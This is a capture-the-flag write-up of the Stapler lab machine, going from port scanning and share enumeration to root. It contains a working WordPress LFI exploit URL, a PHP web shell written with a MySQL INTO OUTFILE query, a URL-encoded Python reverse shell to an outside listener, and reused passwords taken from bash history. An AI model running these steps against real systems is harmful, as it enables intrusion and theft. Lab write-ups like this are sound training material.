Service Discovery
Running a port scan of the top 1000 ports using Nmap (nmap -sS -sV -sC -vv 10.2.0.104) revealed that the machine has a number of different public facing services; one of which Nmap was unable to fingerprint:
PORT STATE SERVICE REASON VERSION
20/tcp closed ftp-data reset ttl 64
21/tcp open ftp syn-ack ttl 64 vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: Can't parse PASV response: "Permission denied."
22/tcp open ssh syn-ack ttl 64 OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 81:21:ce:a1:1a:05:b1:69:4f:4d:ed:80:28:e8:99:05 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDc/xrBbi5hixT2B19dQilbbrCaRllRyNhtJcOzE8x0BM1ow9I80RcU7DtajyqiXXEwHRavQdO+/cHZMyOiMFZG59OCuIouLRNoVO58C91gzDgDZ1fKH6BDg+FaSz+iYZbHg2lzaMPbRje6oqNamPR4QGISNUpxZeAsQTLIiPcRlb5agwurovTd3p0SXe0GknFhZwHHvAZWa2J6lHE2b9K5IsSsDzX2WHQ4vPb+1DzDHV0RTRVUGviFvUX1X5tVFvVZy0TTFc0minD75CYClxLrgc+wFLPcAmE2C030ER/Z+9umbhuhCnLkLN87hlzDSRDPwUjWr+sNA3+7vc/xuZul
| 256 5b:a5:bb:67:91:1a:51:c2:d3:21:da:c0:ca:f0:db:9e (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNQB5n5kAZPIyHb9lVx1aU0fyOXMPUblpmB8DRjnP8tVIafLIWh54wmTFVd3nCMr1n5IRWiFeX1weTBDSjjz0IY=
| 256 6d:01:b7:73:ac:b0:93:6f:fa:b9:89:e6:ae:3c:ab:d3 (EdDSA)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJ9wvrF4tkFMApswOmWKpTymFjkaiIoie4QD0RWOYnny
53/tcp open domain syn-ack ttl 64 dnsmasq 2.75
| dns-nsid:
|_ bind.version: dnsmasq-2.75
80/tcp open http syn-ack ttl 64 PHP cli server 5.5 or later
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: 404 Not Found
139/tcp open netbios-ssn syn-ack ttl 64 Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
666/tcp open doom? syn-ack ttl 64
| fingerprint-strings:
| NULL:
| message2.jpgUT
| QWux
| "DL[E
| #;3[
| \xf6
| u([r
| qYQq
| Y_?n2
| 3&M~{
| 9-a)T
| L}AJ
|_ .npy.9
3306/tcp open mysql syn-ack ttl 64 MySQL 5.7.12-0ubuntu1
| mysql-info:
| Protocol: 10
| Version: 5.7.12-0ubuntu1
| Thread ID: 7
| Capabilities flags: 63487
| Some Capabilities: Support41Auth, ConnectWithDatabase, SupportsCompression, Speaks41ProtocolOld, IgnoreSpaceBeforeParenthesis, SupportsLoadDataLocal, IgnoreSigpipes, ODBCClient, LongPassword, InteractiveClient, FoundRows, LongColumnFlag, DontAllowDatabaseTableColumn, Speaks41ProtocolNew, SupportsTransactions, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
| Status: Autocommit
| Salt: a;C\x18YuU)RZC0\x0E\x0C\x08fv(\x0BJ
|_ Auth Plugin Name: 88
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port666-TCP:V=7.50%I=7%D=8/6%Time=598714A7%P=i686-pc-linux-gnu%r(NULL,2
SF:D58,"PK\x03\x04\x14\0\x02\0\x08\0d\x80\xc3Hp\xdf\x15\x81\xaa,\0\0\x152\
SF:0\0\x0c\0\x1c\0message2\.jpgUT\t\0\x03\+\x9cQWJ\x9cQWux\x0b\0\x01\x04\x
SF:f5\x01\0\0\x04\x14\0\0\0\xadz\x0bT\x13\xe7\xbe\xefP\x94\x88\x88A@\xa2\x
SF:20\x19\xabUT\xc4T\x11\xa9\x102>\x8a\xd4RDK\x15\x85Jj\xa9\"DL\[E\xa2\x0c
SF:\x19\x140<\xc4\xb4\xb5\xca\xaen\x89\x8a\x8aV\x11\x91W\xc5H\x20\x0f\xb2\
SF:xf7\xb6\x88\n\x82@%\x99d\xb7\xc8#;3\[\r_\xcddr\x87\xbd\xcf9\xf7\xaeu\xe
SF:eY\xeb\xdc\xb3oX\xacY\xf92\xf3e\xfe\xdf\xff\xff\xff=2\x9f\xf3\x99\xd3\x
SF:08y}\xb8a\xe3\x06\xc8\xc5\x05\x82>`\xfe\x20\xa7\x05:\xb4y\xaf\xf8\xa0\x
SF:f8\xc0\^\xf1\x97sC\x97\xbd\x0b\xbd\xb7nc\xdc\xa4I\xd0\xc4\+j\xce\[\x87\
SF:xa0\xe5\x1b\xf7\xcc=,\xce\x9a\xbb\xeb\xeb\xdds\xbf\xde\xbd\xeb\x8b\xf4\
SF:xfdis\x0f\xeeM\?\xb0\xf4\x1f\xa3\xcceY\xfb\xbe\x98\x9b\xb6\xfb\xe0\xdc\
SF:]sS\xc5bQ\xfa\xee\xb7\xe7\xbc\x05AoA\x93\xfe9\xd3\x82\x7f\xcc\xe4\xd5\x
SF:1dx\xa2O\x0e\xdd\x994\x9c\xe7\xfe\x871\xb0N\xea\x1c\x80\xd63w\xf1\xaf\x
SF:bd&&q\xf9\x97'i\x85fL\x81\xe2\\\xf6\xb9\xba\xcc\x80\xde\x9a\xe1\xe2:\xc
SF:3\xc5\xa9\x85`\x08r\x99\xfc\xcf\x13\xa0\x7f{\xb9\xbc\xe5:i\xb2\x1bk\x8a
SF:\xfbT\x0f\xe6\x84\x06/\xe8-\x17W\xd7\xb7&\xb9N\x9e<\xb1\\\.\xb9\xcc\xe7
SF:\xd0\xa4\x19\x93\xbd\xdf\^\xbe\xd6\xcdg\xcb\.\xd6\xbc\xaf\|W\x1c\xfd\xf
SF:6\xe2\x94\xf9\xebj\xdbf~\xfc\x98x'\xf4\xf3\xaf\x8f\xb9O\xf5\xe3\xcc\x9a
SF:\xed\xbf`a\xd0\xa2\xc5KV\x86\xad\n\x7fou\xc4\xfa\xf7\xa37\xc4\|\xb0\xf1
SF:\xc3\x84O\xb6nK\xdc\xbe#\)\xf5\x8b\xdd{\xd2\xf6\xa6g\x1c8\x98u\(\[r\xf8
SF:H~A\xe1qYQq\xc9w\xa7\xbe\?}\xa6\xfc\x0f\?\x9c\xbdTy\xf9\xca\xd5\xaak\xd
SF:7\x7f\xbcSW\xdf\xd0\xd8\xf4\xd3\xddf\xb5F\xabk\xd7\xff\xe9\xcf\x7fy\xd2
SF:\xd5\xfd\xb4\xa7\xf7Y_\?n2\xff\xf5\xd7\xdf\x86\^\x0c\x8f\x90\x7f\x7f\xf
SF:9\xea\xb5m\x1c\xfc\xfef\"\.\x17\xc8\xf5\?B\xff\xbf\xc6\xc5,\x82\xcb\[\x
SF:93&\xb9NbM\xc4\xe5\xf2V\xf6\xc4\t3&M~{\xb9\x9b\xf7\xda-\xac\]_\xf9\xcc\
SF:[qt\x8a\xef\xbao/\xd6\xb6\xb9\xcf\x0f\xfd\x98\x98\xf9\xf9\xd7\x8f\xa7\x
SF:fa\xbd\xb3\x12_@N\x84\xf6\x8f\xc8\xfe{\x81\x1d\xfb\x1fE\xf6\x1f\x81\xfd
SF:\xef\xb8\xfa\xa1i\xae\.L\xf2\\g@\x08D\xbb\xbfp\xb5\xd4\xf4Ym\x0bI\x96\x
SF:1e\xcb\x879-a\)T\x02\xc8\$\x14k\x08\xae\xfcZ\x90\xe6E\xcb<C\xcap\x8f\xd
SF:0\x8f\x9fu\x01\x8dvT\xf0'\x9b\xe4ST%\x9f5\x95\xab\rSWb\xecN\xfb&\xf4\xe
SF:d\xe3v\x13O\xb73A#\xf0,\xd5\xc2\^\xe8\xfc\xc0\xa7\xaf\xab4\xcfC\xcd\x88
SF:\x8e}\xac\x15\xf6~\xc4R\x8e`wT\x96\xa8KT\x1cam\xdb\x99f\xfb\n\xbc\xbcL}
SF:AJ\xe5H\x912\x88\(O\0k\xc9\xa9\x1a\x93\xb8\x84\x8fdN\xbf\x17\xf5\xf0\.n
SF:py\.9\x04\xcf\x14\x1d\x89Rr9\xe4\xd2\xae\x91#\xfbOg\xed\xf6\x15\x04\xf6
SF:~\xf1\]V\xdcBGu\xeb\xaa=\x8e\xef\xa4HU\x1e\x8f\x9f\x9bI\xf4\xb6GTQ\xf3\
SF:xe9\xe5\x8e\x0b\x14L\xb2\xda\x92\x12\xf3\x95\xa2\x1c\xb3\x13\*P\x11\?\x
SF:fb\xf3\xda\xcaDfv\x89`\xa9\xe4k\xc4S\x0e\xd6P0");
MAC Address: 08:00:27:EE:6E:0D (Oracle VirtualBox virtual NIC)
Service Info: Host: RED; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 59m59s, deviation: 0s, median: 59m59s
| nbstat: NetBIOS name: RED, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| RED<00> Flags: <unique><active>
| RED<03> Flags: <unique><active>
| RED<20> Flags: <unique><active>
| WORKGROUP<00> Flags: <group><active>
| WORKGROUP<1e> Flags: <group><active>
| Statistics:
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_ 00 00 00 00 00 00 00 00 00 00 00 00 00 00
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 64254/tcp): CLEAN (Timeout)
| Check 2 (port 39167/tcp): CLEAN (Timeout)
| Check 3 (port 50868/udp): CLEAN (Failed to receive data)
| Check 4 (port 38517/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.9-Ubuntu)
| Computer name: red
| NetBIOS computer name: RED\x00
| Domain name: \x00
| FQDN: red
|_ System time: 2017-08-06T15:08:03+01:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol
Samba
As Nmap was able to identify a Samba service that seemingly allowed guest access, I used smbclient to get a list of the available shares and began to enumerate them for information:
root@kali:~# smbclient -L \\RED -I 10.2.0.104
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
kathy Disk Fred, What are we doing here?
tmp Disk All temporary files should be stored here
IPC$ IPC IPC Service (red server (Samba, Ubuntu))
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]
Server Comment
--------- -------
RED red server (Samba, Ubuntu)
The first share I took a look into was the kathy share; which contained three files:
- A todo list
- A WordPress archive
- A vsftpd configuration file
root@kali:~/stapler# smbclient //RED/kathy -I 10.2.0.104
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]
smb: \> ls
. D 0 Fri Jun 3 17:52:52 2016
.. D 0 Mon Jun 6 22:39:56 2016
kathy_stuff D 0 Sun Jun 5 16:02:27 2016
backup D 0 Sun Jun 5 16:04:14 2016
19478204 blocks of size 1024. 16397128 blocks available
smb: \> cd backup
smb: \backup\> ls
. D 0 Sun Jun 5 16:04:14 2016
.. D 0 Fri Jun 3 17:52:52 2016
vsftpd.conf N 5961 Sun Jun 5 16:03:45 2016
wordpress-4.tar.gz N 6321767 Mon Apr 27 18:14:46 2015
19478204 blocks of size 1024. 16397128 blocks available
smb: \backup\> get vsftpd.conf
getting file \backup\vsftpd.conf of size 5961 as vsftpd.conf (1455.3 KiloBytes/sec) (average 1455.3 KiloBytes/sec)
smb: \backup\> get wordpress-4.tar.gz
getting file \backup\wordpress-4.tar.gz of size 6321767 as wordpress-4.tar.gz (45730.3 KiloBytes/sec) (average 43517.5 KiloBytes/sec)
smb: \backup\> cd ..
smb: \> cd kathy_stuff\
smb: \kathy_stuff\> ls
. D 0 Sun Jun 5 16:02:27 2016
.. D 0 Fri Jun 3 17:52:52 2016
todo-list.txt N 64 Sun Jun 5 16:02:27 2016
19478204 blocks of size 1024. 16397128 blocks available
smb: \kathy_stuff\> get todo-list.txt
getting file \kathy_stuff\todo-list.txt of size 64 as todo-list.txt (20.8 KiloBytes/sec) (average 840.5 KiloBytes/sec)
smb: \kathy_stuff\>
The todo-list.txt file contained the text, I'm making sure to backup anything important for Initech, Kathy; which led me to believe the WordPress archive may be one from a live deployment and contain a valid wp-config.php, but after inflating the archive (tar -xvf wordpress-4.tar.gz) it seemed that it just contained the core files for an installation, rather than being an actual backup.
Likewise, there was nothing of huge interest in the vsftpd.conf file; other than it confirming what Nmap had already found (i.e. that anonymous FTP access was enabled).
Next, I took a look at the tmp share, only to find a file named ls which contained the output of ls being executed on the machine:
root@kali:~/stapler# smbclient //RED/tmp -I 10.2.0.104
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]
smb: \> ls
. D 0 Tue Jun 7 09:08:39 2016
.. D 0 Mon Jun 6 22:39:56 2016
ls N 274 Sun Jun 5 16:32:58 2016
19478204 blocks of size 1024. 16397128 blocks available
smb: \> get ls
getting file \ls of size 274 as ls (89.2 KiloBytes/sec) (average 89.2 KiloBytes/sec)
smb: \>
root@kali:~/stapler# cat ls
.:
total 12.0K
drwxrwxrwt 2 root root 4.0K Jun 5 16:32 .
drwxr-xr-x 16 root root 4.0K Jun 3 22:06 ..
-rw-r--r-- 1 root root 0 Jun 5 16:32 ls
drwx------ 3 root root 4.0K Jun 5 15:32 systemd-private-df2bff9b90164a2eadc490c0b8f76087-systemd-timesyncd.service-vFKoxJ
Whilst I was taking a look at Samba, I also had a look for any vulnerabilities that could be leveraged at this stage that affect Samba 4.3.9, but none seemed applicable.
Anonymous FTP
As the vsftpd configuration file and Nmap both indicated anonymous FTP access was enabled, I connected to see if there were any useful files. Only one file was present though, which was a note which potentially revealed a username (elly):
root@kali:~/stapler# ftp 10.2.0.104
Connected to 10.2.0.104.
220-
220-|-----------------------------------------------------------------------------------------|
220-| Harry, make sure to update the banner when you get a chance to show who has access here |
220-|-----------------------------------------------------------------------------------------|
220-
220
Name (10.2.0.104:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 107 Jun 03 2016 note
226 Directory send OK.
ftp> get note
local: note remote: note
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note (107 bytes).
226 Transfer complete.
107 bytes received in 0.00 secs (52.2722 kB/s)
ftp>
root@kali:~/stapler# cat note
Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.
Reverse Domain Lookup
As there is both a web server and a DNS server present, I used dig to do a reverse lookup, to see if there are any hostnames associated with 127.0.0.1, but only found localhost:
root@kali:~/stapler# dig +noall +answer -x 127.0.0.1 @10.2.0.104
1.0.0.127.in-addr.arpa. 0 IN PTR localhost.
Port 666
Using nc to connect to port 666 to try and fingerprint the service manually resulted in it outputting some binary data and instantly closing the connection.
A closer look at the data retrieved led me to believe it was possibly a ZIP file, as there seemed to be a plaintext file name in the output:
Piping the output directly to a file (nc 10.2.0.104 666 > 666.zip) allowed me to unzip it and extract message2.jpg, which was a screenshot of some terminal output:
This suggested that a custom binary may have possibly been being used for the echo command that has a buffer overflow; for now though, as the service seemingly wasn’t processing any input being passed to it, this was put on the bench.
PHP CLI Server & Apache
Running dirb against port 80 (i.e. the PHP CLI server) didn’t return much. It indicated that it was serving up the contents of a home directory, but began running into errors, even when throttling the request rate:
---- Scanning URL: http://10.2.0.104/ ----
+ http://10.2.0.104/.bashrc (CODE:200|SIZE:3771)
+ http://10.2.0.104/.profile (CODE:200|SIZE:675)
(!) FATAL: Too many errors connecting to host
(Possible cause: EMPTY REPLY FROM SERVER)
With [seemingly] no low hanging fruit available, I did a full port scan and found another web server running. This time, it was Apache on port 12380:
PORT STATE SERVICE REASON VERSION
12380/tcp open http syn-ack ttl 64 Apache httpd 2.4.18 ((Ubuntu))
Running dirb against port 12380 didn’t return any results and the landing page, when accessed over HTTP, didn’t elude to anything. Accessing over HTTPS, however, led to a page with the text Internal Index Page!
A look at the SSL certificate showed that the common name was red.initech:
I added red.initech to my hosts file to see if there was a vhost setup for it in Apache, but it led back to the same page as before.
Now that I had access to what was seemingly an internal web server, I began running dirb again, which uncovered a few interesting results:
root@kali:~/stapler# dirb https://red.initech:12380 /usr/share/wordlists/dirb/big.txt
***
---- Scanning URL: https://red.initech:12380/ ----
==> DIRECTORY: https://red.initech:12380/announcements/
==> DIRECTORY: https://red.initech:12380/javascript/
==> DIRECTORY: https://red.initech:12380/phpmyadmin/
+ https://red.initech:12380/robots.txt (CODE:200|SIZE:59)
+ https://red.initech:12380/server-status (CODE:403|SIZE:302)
The first thing I checked out from these results was the phpMyAdmin installation. By going to https://red.initech:12380/phpmyadmin/doc/html/index.html I was able to fingerprint the installation as version 4.5.4.1, which has no usable unauthenticated vulnerabilities that can be used against it.
Next, I checked out the announcements directory to see if there was any interesting information, but the only file was message.txt which contained the content: Abby, we need to link the folder somewhere! Hidden at the mo.
The robots.txt file, however, contained two interesting directories - admin1122233 and blogblog. The admin directory redirected to an external website, but the blogblog directory contained a WordPress installation.
A quick look at the wp-content/plugins directory revealed that the directory listing was enabled and that I had full visibility of all installed plugins; one of which, seemed to contain an LFI vulnerability (https://www.exploit-db.com/exploits/39646/)
The vulnerability allows unauthenticated users to create new posts, which also attaches a copy of the specified file into the uploads directory with a JPEG extension. As JPEG images won’t be interpreted by PHP before being served, it allows for PHP files to be downloaded as plain text.
With this in mind, I used the vulnerability to create a copy of the wp-config.php file by visiting https://red.initech:12380/blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=asdasd&short=rnd&term=rnd&thumb=../wp-config.php and was then able to extract the MySQL credentials used by WordPress
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');
/** MySQL database username */
define('DB_USER', 'root');
/** MySQL database password */
define('DB_PASSWORD', 'plbkac');
/** MySQL hostname */
define('DB_HOST', 'localhost');
As I now had credentials to login to phpMyAdmin with, I created a new WordPress account on https://10.2.0.104:12380/blogblog/wp-login.php?action=register and navigated to the wp_users table of the wordpress database and replaced the automatically generated password with an MD5 hash of my chosen password in the user_pass field.
In addition to setting a password, I also needed to set the wp_user_level option in the wp_usermeta table for my account to be 10, i.e. an administrator (see https://codex.wordpress.org/User_Levels).
Lastly, I changed the wp_capabilities option in the wp_usermeta table to a:1:{s:13:"administrator";b:1;}, which finalised elevating my new account into a full administrator, with access to all management options:
With a full administrator account, I attempted to use the plugin and theme editor to store a reverse shell, but there was no write access to the plugins and themes directories.
Whilst looking around the admin area, I saw an error on the updates page which revealed the full path to the WordPress installation, which was: /var/www/https/blogblog/
As it’s possible to save the output of a query in MySQL to a file, I used this path disclosure in combination with the phpMyAdmin login in an attempt to create a file containing <?php phpinfo(); ?>, for testing purposes, by running the query: select '<?php phpinfo(); ?>' into OUTFILE '/var/www/https/blogblog/test.php' but the top level directory of the blog was seemingly unwritable.
As I know for sure that the wp-content/uploads directory was writable, I modified the query to instead write there, and successfully got PHP execution:
With PHP execution now possible, I re-used the same query to create a command executor (<?php echo shell_exec($_GET["e"]); ?>), which would allow system commands to be executed, but didn’t provide an interactive shell.
Low Privilege Shell
Now that I had a way to execute system commands via the command executor, I started a listener using SuperTTY (https://github.com/bad-hombres/supertty):
root@kali:~/stapler# supertty --port 5555
( )
)\ ) * ) * ) ( /( ) )
(()/( ( ( ( ` ) /(` ) /( )\()) ) ( /( ( /(
/(_))))\ ` ) ))\ )( ( )(_))( )(_)|(_)\ /(( )\()))\())
(_)) /((_)/(/( /((_|()\(_(_())(_(_())_ ((_) (_))((_)\((_)\
/ __(_))(((_)_\(_)) ((_)_ _||_ _\ \ / / _)((_) (_) (_)
\__ \ || | '_ \) -_)| '_| | | | | \ V / \ V /| || () |
|___/\_,_| .__/\___||_| |_| |_| |_| \_/ |_(_)__/
|_|
(c) Bad Hombres 2017
[+] Starting a reverse listener on port: 5555
[+] Got terminal: xterm-256color
[+] Got terminal size (68 rows, 180 columns)
[+] Setting up local terminal.....
Then used the command executor to run some inline Python to connect back to the listener:
https://10.2.0.104:12380/blogblog/wp-content/uploads/cmd.php?e=python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket%28socket.AF_INET%2Csocket.SOCK_STREAM%29%3Bs.connect%28%28%2210.2.0.3%22%2C5555%29%29%3Bos.dup2%28s.fileno%28%29%2C0%29%3B%20os.dup2%28s.fileno%28%29%2C1%29%3B%20os.dup2%28s.fileno%28%29%2C2%29%3Bp%3Dsubprocess.call%28%5B%22%2Fbin%2Fsh%22%2C%22-i%22%5D%29%3B%27
Now, I had a fully interactive shell and could start some recon!
Recon & Privilege Escalation
Running ps aux showed that the JKanode user was running a HTTP server on port 8888, but it was of no use, as it was just serving up the home directory which I already had access to. root was also running a continuous script from the /root directory, but due to lack of permissions, I couldn’t see what it was:
JKanode 1450 0.0 0.4 14696 4536 ? S 15:02 0:02 python2 -m SimpleHTTPServer 8888
root 1410 0.0 0.2 5720 2196 ? S 15:02 0:00 /bin/bash /root/python.sh
In case this script was listening for anything locally, I ran netstat -a to try and identify any previously unidentified services. Doing so, suggested a tftp service was running over UDP:
udp 0 0 *:tftp *:*
A look at the iptables configuration also shows that all external UDP traffic is being accepted:
www-data@red:/home$ cat /etc/iptables/rules.v4
# Generated by iptables-save v1.6.0 on Fri Jun 3 22:08:54 2016
*filter
:INPUT DROP [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
-A INPUT -p tcp -m state --state RELATED,ESTABLISHED -j ACCEPT
-A INPUT -p udp -j ACCEPT
-A INPUT -p icmp -j DROP
-A INPUT -p tcp -m tcp --dport 20 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 21 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 53 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 80 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 123 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 137 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 138 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 139 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 666 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 3306 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 12380 -j ACCEPT
COMMIT
In the hope this may be misconfigured and allowing access into the /root directory or possibly allow for some service re-configuration, I used tftp to transfer a file across, and then used find to search the file system for the matching file name, but it led back to the /srv/tftp directory and was writing files as nobody:nogroup.
The home directory contained quite a lot of user directories, doing a listing of all of them using ls -la * revealed that peter had previously ran something using sudo; making this account one which would be useful to get access to:
peter:
total 72
drwxr-xr-x 3 peter peter 4096 Jun 3 2016 .
drwxr-xr-x 32 root root 4096 Jun 4 2016 ..
-rw------- 1 peter peter 1 Jun 5 2016 .bash_history
-rw-r--r-- 1 peter peter 220 Jun 3 2016 .bash_logout
-rw-r--r-- 1 peter peter 3771 Jun 3 2016 .bashrc
drwx------ 2 peter peter 4096 Jun 6 2016 .cache
-rw-r--r-- 1 peter peter 675 Jun 3 2016 .profile
-rw-r--r-- 1 peter peter 0 Jun 3 2016 .sudo_as_admin_successful
-rw------- 1 peter peter 577 Jun 3 2016 .viminfo
-rw-rw-r-- 1 peter peter 39206 Jun 3 2016 .zcompdump
Listing the bash history for all users revealed a couple of interesting lines:
sshpass -p thisimypassword ssh JKanode@localhost
apt-get install sshpass
sshpass -p JZQuyIN5 peter@localhost
As I had just identified that peter has some sudo privileges, I tried to SSH into the machine using the credentials from the bash history, which let me in and presented me with a zsh setup screen. I simply exited this setup, and ran /bin/bash and checked the sudo privileges:
peter@red:~$ sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
[sudo] password for peter:
Matching Defaults entries for peter on red:
lecture=always, env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User peter may run the following commands on red:
(ALL : ALL) ALL
As peter had full sudo privileges, I ran bash with sudo to get root access, and then proceeded to retrieve the flag:
peter@red:~$ sudo /bin/bash
root@red:~# cd /root
root@red:/root# ls
fix-wordpress.sh flag.txt issue python.sh wordpress.sql
root@red:/root# cat flag.txt
~~~~~~~~~~<(Congratulations)>~~~~~~~~~~
.-'''''-.
|'-----'|
|-.....-|
| |
| |
_,._ | |
__.o` o`"-. | |
.-O o `"-.o O )_,._ | |
( o O o )--.-"`O o"-.`'-----'`
'--------' ( o O o)
`----------`
b6b545dc11b7a270f4bad23432190c75162c4a2b
root@red:/root#
The total time taken to root this machine was 4 hours, 15 minutes